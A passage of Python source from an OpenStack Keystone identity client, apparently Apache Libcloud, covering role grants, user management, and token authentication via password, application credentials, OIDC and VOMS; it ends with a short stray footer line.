        response = self.authenticated_request(path, method='GET')
        result = self._to_projects(data=response.object['projects'])
        return result

    def list_user_domain_roles(self, domain, user):
        """
        Retrieve all the roles for a particular user on a domain.

        :rtype: ``list`` of :class:`.OpenStackIdentityRole`
        """
        # TODO: Also add "get users roles" and "get assginements" which are
        # available in 3.1 and 3.3
        path = '/v3/domains/%s/users/%s/roles' % (domain.id, user.id)
        response = self.authenticated_request(path, method='GET')
        result = self._to_roles(data=response.object['roles'])
        return result

    def grant_domain_role_to_user(self, domain, role, user):
        """
        Grant domain role to a user.

        Note: This function appears to be idempotent.

        :param domain: Domain to grant the role to.
        :type domain: :class:`.OpenStackIdentityDomain`

        :param role: Role to grant.
        :type role: :class:`.OpenStackIdentityRole`

        :param user: User to grant the role to.
        :type user: :class:`.OpenStackIdentityUser`

        :return: ``True`` on success.
        :rtype: ``bool``
        """
        path = ('/v3/domains/%s/users/%s/roles/%s' %
                (domain.id, user.id, role.id))
        response = self.authenticated_request(path, method='PUT')
        return response.status == httplib.NO_CONTENT

    def revoke_domain_role_from_user(self, domain, user, role):
        """
        Revoke domain role from a user.

        :param domain: Domain to revoke the role from.
        :type domain: :class:`.OpenStackIdentityDomain`

        :param role: Role to revoke.
        :type role: :class:`.OpenStackIdentityRole`

        :param user: User to revoke the role from.
        :type user: :class:`.OpenStackIdentityUser`

        :return: ``True`` on success.
        :rtype: ``bool``
        """
        path = ('/v3/domains/%s/users/%s/roles/%s' %
                (domain.id, user.id, role.id))
        response = self.authenticated_request(path, method='DELETE')
        return response.status == httplib.NO_CONTENT

    def grant_project_role_to_user(self, project, role, user):
        """
        Grant project role to a user.

        Note: This function appears to be idempotent.

        :param project: Project to grant the role to.
        :type project: :class:`.OpenStackIdentityDomain`

        :param role: Role to grant.
        :type role: :class:`.OpenStackIdentityRole`

        :param user: User to grant the role to.
        :type user: :class:`.OpenStackIdentityUser`

        :return: ``True`` on success.
        :rtype: ``bool``
        """
        path = ('/v3/projects/%s/users/%s/roles/%s' %
                (project.id, user.id, role.id))
        response = self.authenticated_request(path, method='PUT')
        return response.status == httplib.NO_CONTENT

    def revoke_project_role_from_user(self, project, role, user):
        """
        Revoke project role from a user.

        :param project: Project to revoke the role from.
        :type project: :class:`.OpenStackIdentityDomain`

        :param role: Role to revoke.
        :type role: :class:`.OpenStackIdentityRole`

        :param user: User to revoke the role from.
        :type user: :class:`.OpenStackIdentityUser`

        :return: ``True`` on success.
        :rtype: ``bool``
        """
        path = ('/v3/projects/%s/users/%s/roles/%s' %
                (project.id, user.id, role.id))
        response = self.authenticated_request(path, method='DELETE')
        return response.status == httplib.NO_CONTENT

    def create_user(self, email, password, name, description=None,
                    domain_id=None, default_project_id=None, enabled=True):
        """
        Create a new user account.

        :param email: User's mail address.
        :type email: ``str``

        :param password: User's password.
        :type password: ``str``

        :param name: User's name.
        :type name: ``str``

        :param description: Optional description.
        :type description: ``str``

        :param domain_id: ID of the domain to add the user to (optional).
        :type domain_id: ``str``

        :param default_project_id: ID of the default user project (optional).
        :type default_project_id: ``str``

        :param enabled: True to enable user after creation.
        :type enabled: ``bool``

        :return: Created user.
        :rtype: :class:`.OpenStackIdentityUser`
        """
        data = {
            'email': email,
            'password': password,
            'name': name,
            'enabled': enabled
        }

        if description:
            data['description'] = description

        if domain_id:
            data['domain_id'] = domain_id

        if default_project_id:
            data['default_project_id'] = default_project_id

        data = json.dumps({'user': data})
        response = self.authenticated_request('/v3/users', data=data,
                                              method='POST')

        user = self._to_user(data=response.object['user'])
        return user

    def enable_user(self, user):
        """
        Enable user account.

        Note: This operation appears to be idempotent.

        :param user: User to enable.
        :type user: :class:`.OpenStackIdentityUser`

        :return: User account which has been enabled.
        :rtype: :class:`.OpenStackIdentityUser`
        """
        data = {
            'enabled': True
        }
        data = json.dumps({'user': data})
        response = self.authenticated_request('/v3/users/%s' % (user.id),
                                              data=data,
                                              method='PATCH')

        user = self._to_user(data=response.object['user'])
        return user

    def disable_user(self, user):
        """
        Disable user account.

        Note: This operation appears to be idempotent.

        :param user: User to disable.
        :type user: :class:`.OpenStackIdentityUser`

        :return: User account which has been disabled.
        :rtype: :class:`.OpenStackIdentityUser`
        """
        data = {
            'enabled': False
        }
        data = json.dumps({'user': data})
        response = self.authenticated_request('/v3/users/%s' % (user.id),
                                              data=data,
                                              method='PATCH')

        user = self._to_user(data=response.object['user'])
        return user

    def _get_auth_data(self):
        data = {
            'auth': {
                'identity': {
                    'methods': ['password'],
                    'password': {
                        'user': {
                            'domain': {
                                'name': self.domain_name
                            },
                            'name': self.user_id,
                            'password': self.key
                        }
                    }
                }
            }
        }

        if self.token_scope == OpenStackIdentityTokenScope.PROJECT:
            # Scope token to project (tenant)
            data['auth']['scope'] = {
                'project': {
                    'domain': {
                        'id': self.tenant_domain_id
                    },
                    'name': self.tenant_name
                }
            }
        elif self.token_scope == OpenStackIdentityTokenScope.DOMAIN:
            # Scope token to domain
            data['auth']['scope'] = {
                'domain': {
                    'name': self.domain_name
                }
            }
        elif self.token_scope == OpenStackIdentityTokenScope.UNSCOPED:
            pass
        else:
            raise ValueError('Token needs to be scoped either to project or '
                             'a domain')

        return data

    def _load_auth_context_from_cache(self):
        context = super()._load_auth_context_from_cache()
        if context is None:
            return None

        # Since v3 only caches the token and expiration, fetch the
        # service catalog and other bits of the authentication context
        # from Keystone.
        try:
            self._fetch_auth_token()
        except InvalidCredsError:
            # Unauthorized; cached auth context was cleared as part of
            # _fetch_auth_token
            return None

        # Local auth context variables set in _fetch_auth_token
        return context

    def _parse_token_response(self, response, cache_it=False,
                              raise_ambiguous_version_error=True):
        """
        Parse a response from /v3/auth/tokens.

        :param cache_it: Should we cache the authentication context?
        :type cache_it: ``bool``

        :param raise_ambiguous_version_error: Should an ambiguous version
            error be raised on a 300 response?
        :type raise_ambiguous_version_error: ``bool``
        """
        if response.status == httplib.UNAUTHORIZED:
            raise InvalidCredsError()
        elif response.status in [httplib.OK, httplib.CREATED]:
            headers = response.headers

            try:
                body = json.loads(response.body)
            except Exception as e:
                raise MalformedResponseError('Failed to parse JSON', e)

            try:
                roles = self._to_roles(body['token']['roles'])
            except Exception:
                roles = []

            try:
                expires = parse_date(body['token']['expires_at'])
                token = headers['x-subject-token']

                # Cache the fewest fields required for token reuse to minimize
                # cache size. Other fields, especially the service catalog, can
                # be quite large. Fetch these from Keystone when the token is
                # first loaded from cache.
                if cache_it:
                    self._cache_auth_context(
                        OpenStackAuthenticationContext(
                            token, expiration=expires))

                self.auth_token = token
                self.auth_token_expires = expires
                # Note: catalog is not returned for unscoped tokens
                self.urls = body['token'].get('catalog', None)
                self.auth_user_info = body['token'].get('user', None)
                self.auth_user_roles = roles
            except KeyError as e:
                raise MalformedResponseError('Auth JSON response is \
                                             missing required elements', e)
        elif raise_ambiguous_version_error and response.status == 300:
            # ambiguous version request
            raise LibcloudError(
                'Auth request returned ambiguous version error, try'
                'using the version specific URL to connect,'
                ' e.g. identity/v3/auth/tokens')
        else:
            body = 'code: %s body:%s' % (response.status, response.body)
            raise MalformedResponseError('Malformed response', body=body,
                                         driver=self.driver)

    def _fetch_auth_token(self):
        """
        Fetch our authentication token and service catalog.
        """
        headers = {'X-Subject-Token': self.auth_token}
        response = self.authenticated_request('/v3/auth/tokens',
                                              headers=headers)
        self._parse_token_response(response)
        return self

    def _to_domains(self, data):
        result = []
        for item in data:
            domain = self._to_domain(data=item)
            result.append(domain)

        return result

    def _to_domain(self, data):
        domain = OpenStackIdentityDomain(id=data['id'],
                                         name=data['name'],
                                         enabled=data['enabled'])
        return domain

    def _to_users(self, data):
        result = []
        for item in data:
            user = self._to_user(data=item)
            result.append(user)

        return result

    def _to_user(self, data):
        user = OpenStackIdentityUser(id=data['id'],
                                     domain_id=data['domain_id'],
                                     name=data['name'],
                                     email=data.get('email'),
                                     description=data.get('description',
                                                          None),
                                     enabled=data.get('enabled'))
        return user

    def _to_roles(self, data):
        result = []
        for item in data:
            user = self._to_role(data=item)
            result.append(user)

        return result

    def _to_role(self, data):
        role = OpenStackIdentityRole(id=data['id'],
                                     name=data['name'],
                                     description=data.get('description',
                                                          None),
                                     enabled=data.get('enabled', True))
        return role


class OpenStackIdentity_3_0_Connection_AppCred(
        OpenStackIdentity_3_0_Connection):
    """
    Connection class for Keystone API v3.x using Application Credentials.

    'user_id' is the application credential id and 'key' is the application
    credential secret.
    """
    name = 'OpenStack Identity API v3.x with Application Credentials'

    def __init__(self, auth_url, user_id, key, tenant_name=None,
                 domain_name=None, tenant_domain_id=None, token_scope=None,
                 timeout=None, proxy_url=None, parent_conn=None):
        """
        Tenant, domain and scope options are ignored as they are contained
        within the app credential itself and can't be changed.
        """
        super(OpenStackIdentity_3_0_Connection_AppCred,
              self).__init__(auth_url=auth_url,
                             user_id=user_id,
                             key=key,
                             tenant_name=tenant_name,
                             domain_name=domain_name,
                             token_scope=OpenStackIdentityTokenScope.UNSCOPED,
                             timeout=timeout,
                             proxy_url=proxy_url,
                             parent_conn=parent_conn)

    def _get_auth_data(self):
        data = {
            'auth': {
                'identity': {
                    'methods': ['application_credential'],
                    'application_credential': {
                        'id': self.user_id,
                        'secret': self.key
                    }
                }
            }
        }
        return data


class OpenStackIdentity_3_0_Connection_OIDC_access_token(
        OpenStackIdentity_3_0_Connection):
    """
    Connection class for Keystone API v3.x. using OpenID Connect tokens

    The OIDC token must be set in the self.key attribute.

    The identity provider name required to get the full path
    must be set in the self.user_id attribute.

    The protocol name required to get the full path
    must be set in the self.tenant_name attribute.

    The self.domain_name attribute can be used either to select the
    domain name in case of domain scoped token or to select the project
    name in case of project scoped token
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v3.x with OIDC support'
    auth_version = '3.0'

    def authenticate(self, force=False):
        """
        Perform authentication.
        """
        if not self._is_authentication_needed(force=force):
            return self

        subject_token = self._get_unscoped_token_from_oidc_token()

        data = {
            'auth': {
                'identity': {
                    'methods': ['token'],
                    'token': {
                        'id': subject_token
                    }
                }
            }
        }

        if self.token_scope == OpenStackIdentityTokenScope.PROJECT:
            # Scope token to project (tenant)
            project_id = self._get_project_id(token=subject_token)
            data['auth']['scope'] = {
                'project': {
                    'id': project_id
                }
            }
        elif self.token_scope == OpenStackIdentityTokenScope.DOMAIN:
            # Scope token to domain
            data['auth']['scope'] = {
                'domain': {
                    'name': self.domain_name
                }
            }
        elif self.token_scope == OpenStackIdentityTokenScope.UNSCOPED:
            pass
        else:
            raise ValueError('Token needs to be scoped either to project or '
                             'a domain')

        data = json.dumps(data)
        response = self.request('/v3/auth/tokens', data=data,
                                headers={'Content-Type': 'application/json'},
                                method='POST')
        self._parse_token_response(response, cache_it=True,
                                   raise_ambiguous_version_error=False)
        return self

    def _get_unscoped_token_from_oidc_token(self):
        """
        Get unscoped token from OIDC access token
        """
        path = ('/v3/OS-FEDERATION/identity_providers/%s/protocols/%s/auth' %
                (self.user_id, self.tenant_name))
        response = self.request(path,
                                headers={'Content-Type': 'application/json',
                                         'Authorization': 'Bearer %s' %
                                         self.key},
                                method='GET')

        if response.status == httplib.UNAUTHORIZED:
            # Invalid credentials
            raise InvalidCredsError()
        elif response.status in [httplib.OK, httplib.CREATED]:
            if 'x-subject-token' in response.headers:
                return response.headers['x-subject-token']
            else:
                raise MalformedResponseError('No x-subject-token returned',
                                             driver=self.driver)
        else:
            raise MalformedResponseError('Malformed response',
                                         driver=self.driver,
                                         body=response.body)

    def _get_project_id(self, token):
        """
        Get the first project ID accessible with the specified access token
        """
        # Try new path first (from ver 1.1)
        path = '/v3/auth/projects'
        response = self.request(path,
                                headers={'Content-Type': 'application/json',
                                         AUTH_TOKEN_HEADER: token},
                                method='GET')

        if response.status not in [httplib.UNAUTHORIZED, httplib.OK,
                                   httplib.CREATED]:
            # In case of error try old one
            path = '/v3/OS-FEDERATION/projects'
            response = self.request(path,
                                    headers={'Content-Type':
                                             'application/json',
                                             AUTH_TOKEN_HEADER: token},
                                    method='GET')

        if response.status == httplib.UNAUTHORIZED:
            # Invalid credentials
            raise InvalidCredsError()
        elif response.status in [httplib.OK, httplib.CREATED]:
            try:
                body = json.loads(response.body)
                # We use domain_name in both cases of the scoped tokens
                # as we have used tenant as the protocol
                if self.domain_name and self.domain_name != 'Default':
                    for project in body['projects']:
                        if self.domain_name in [project['name'],
                                                project['id']]:
                            return project['id']
                    raise ValueError('Project %s not found' %
                                     (self.domain_name))
                else:
                    return body['projects'][0]['id']
            except ValueError as e:
                raise e
            except Exception as e:
                raise MalformedResponseError('Failed to parse JSON', e)
        else:
            raise MalformedResponseError('Malformed response',
                                         driver=self.driver,
                                         body=response.body)


class OpenStackIdentity_2_0_Connection_VOMS(OpenStackIdentityConnection,
                                            CertificateConnection):
    """
    Connection class for Keystone API v2.0. with VOMS proxy support
    In this case the key parameter will be the path of the VOMS proxy file.
    """

    responseCls = OpenStackAuthResponse
    name = 'OpenStack Identity API v2.0 VOMS support'
    auth_version = '2.0'

    def __init__(self, auth_url, user_id, key, tenant_name=None,
                 domain_name='Default',
                 token_scope=OpenStackIdentityTokenScope.PROJECT,
                 timeout=None, proxy_url=None, parent_conn=None,
                 auth_cache=None):
        CertificateConnection.__init__(self, cert_file=key,
                                       url=auth_url,
                                       proxy_url=proxy_url,
                                       timeout=timeout)

        self.parent_conn = parent_conn

        # enable tests to use the same mock connection classes.
        if parent_conn:
            self.conn_class = parent_conn.conn_class
            self.driver = parent_conn.driver
        else:
            self.driver = None

        self.auth_url = auth_url
        self.tenant_name = tenant_name
        self.domain_name = domain_name
        self.token_scope = token_scope
        self.timeout = timeout
        self.proxy_url = proxy_url
        self.auth_cache = auth_cache

        self.urls = {}
        self.auth_token = None
        self.auth_token_expires = None
        self.auth_user_info = None

    def authenticate(self, force=False):
        if not self._is_authentication_needed(force=force):
            return self

        tenant = self.tenant_name
        if not tenant:
            # if the tenant name is not specified look for it
            token = self._get_unscoped_token()
            tenant = self._get_tenant_name(token)

        data = {'auth': {'voms': True, 'tenantName': tenant}}

        reqbody = json.dumps(data)
        return self._authenticate_2_0_with_body(reqbody)

    def _get_unscoped_token(self):
        """
        Get unscoped token from VOMS proxy
        """
        data = {'auth': {'voms': True}}
        reqbody = json.dumps(data)

        response = self.request('/v2.0/tokens', data=reqbody,
                                headers={'Content-Type': 'application/json'},
                                method='POST')

        if response.status == httplib.UNAUTHORIZED:
            # Invalid credentials
            raise InvalidCredsError()
        elif response.status in [httplib.OK, httplib.CREATED]:
            try:
                body = json.loads(response.body)
                return body['access']['token']['id']
            except Exception as e:
                raise MalformedResponseError('Failed to parse JSON', e)
        else:
            raise MalformedResponseError('Malformed response',
                                         driver=self.driver,
                                         body=response.body)

    def _get_tenant_name(self, token):
        """
        Get the first available tenant name (usually there are only one)
        """
        headers = {'Accept': 'application/json',
                   'Content-Type': 'application/json',
                   AUTH_TOKEN_HEADER: token}
        response = self.request('/v2.0/tenants', headers=headers, method='GET')

        if response.status == httplib.UNAUTHORIZED:
            # Invalid credentials
            raise InvalidCredsError()
        elif response.status in [httplib.OK, httplib.CREATED]:
            try:
                body = json.loads(response.body)
                return body["tenants"][0]["name"]
            except Exception as e:
                raise MalformedResponseError('Failed to parse JSON', e)
        else:
            raise MalformedResponseError('Malformed response',
                                         driver=self.driver,
                                         body=response.body)

    def _authenticate_2_0_with_body(self, reqbody):
        resp = self.request('/v2.0/tokens', data=reqbody,
                            headers={'Content-Type': 'application/json'},
                            method='POST')

        if resp.status == httplib.UNAUTHORIZED:
            raise InvalidCredsError()
        elif resp.status not in [httplib.OK,
                                 httplib.NON_AUTHORITATIVE_INFORMATION]:
            body = 'code: %s body: %s' % (resp.status, resp.body)
            raise MalformedResponseError('Malformed response', body=body,
                                         driver=self.driver)
        else:
            body = resp.object

            try:
                access = body['access']
                expires = access['token']['expires']
                self._cache_auth_context(
                    OpenStackAuthenticationContext(
                        access['token']['id'],
                        expiration=parse_date(expires),
                        urls=access['serviceCatalog'],
                        user=access.get('user', {})))
            except KeyError as e:
                raise MalformedResponseError('Auth JSON response is \
                                             missing required elements', e)
        return self


def get_class_for_auth_version(auth_version):
    """
    Retrieve class for the provided auth version.
    """
    if auth_version == '1.0':
        cls = OpenStackIdentity_1_0_Connection
    elif auth_version == '1.1':
        cls = OpenStackIdentity_1_1_Connection
    elif auth_version == '2.0' or auth_version == '2.0_apikey':
        cls = OpenStackIdentity_2_0_Connection
    elif auth_version == '2.0_password':
        cls = OpenStackIdentity_2_0_Connection
    elif auth_version == '2.0_voms':
        cls = OpenStackIdentity_2_0_Connection_VOMS
    elif auth_version == '3.x_password':
        cls = OpenStackIdentity_3_0_Connection
    elif auth_version == '3.x_appcred':
        cls = OpenStackIdentity_3_0_Connection_AppCred
    elif auth_version == '3.x_oidc_access_token':
        cls = OpenStackIdentity_3_0_Connection_OIDC_access_token
    else:
        raise LibcloudError('Unsupported Auth Version requested: %s' %
                            (auth_version))

    return cls

Anon7 - 2022
AnonSec Team